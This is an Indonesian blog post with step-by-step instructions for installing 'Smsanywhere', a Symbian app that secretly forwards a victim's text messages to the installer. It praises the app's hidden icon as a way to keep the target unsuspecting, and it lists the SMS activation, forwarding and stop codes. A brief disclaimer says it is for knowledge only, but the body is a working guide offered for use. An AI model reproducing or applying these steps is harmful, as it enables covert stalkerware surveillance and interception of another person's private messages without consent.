Aplikasi Penyadap SMS Untuk Symbian

Smsanywhere merupakan aplikasi berbasis Symbian yang berkemampuan menyadap sms. Tips ini hanya semata-mata untuk pengetahuan dan bukan untuk disalah gunakan. Sedikit saya terangkan mengenai Smsanywhere. Semua control pada aplikasi ini di control melalui sms, mulai dari pengaktifan, dan mematikan program.  Aplikasi ini tidak memiliki icon yang muncul pada ponsel anda, disinilah letak ke unggulan lain aplikasi ini, dengan icon yang tidak muncul pada ponsel, maka target tidak akan menaruh kecurigaan apapun. Untuk cara pengaktifannya sebagai berikut:
  1. Donload Aplikasinya DISINI
  2. Install aplikasinya di HP anda dan HP Korban
  3. Setelah selesai penginstallan aplikasi, aktifkan aplikasi tersebut di HP korban dengan format sms: SA(spasi)Password(spasi)(ON) Contoh: SA 1234 ON Kirim sms tersebut ke nomor penyadap. Password Maksimal 8. Untuk berhenti SA 1234 OFF.
  4. Jika anda ingin menyadap setiap sms yang dikirimkan korban, ketikkan sms ini di HP korban dengan format: SA(spasi)Password(pasi)S1 Contoh: SA 1234 S1.
  5. Jika sobat ingin menyadap hanya lebih dari 5 hari, ketikkan sms ini ke HP korban dengan format: SA(spasi)Password(spasi)R1 Contoh SA 1234 R1.
Dengan demikian, anda akan selalu menerima"sms korban akan selalu diteruskan ke HP anda" setiap korban melakukan sms ke siapapun.!

Segala Resiko yang disebabkan oleh penyadapan yang anda lakukan, bukan merupakan tanggung jawab saya, Cara ini hanya untuk pengetahuan dan tidak untuk disalahgunakan. Harap fikirkan resiko sebelum anda melakukannya. Terimakasih...........

0 Comments:

Posting Komentar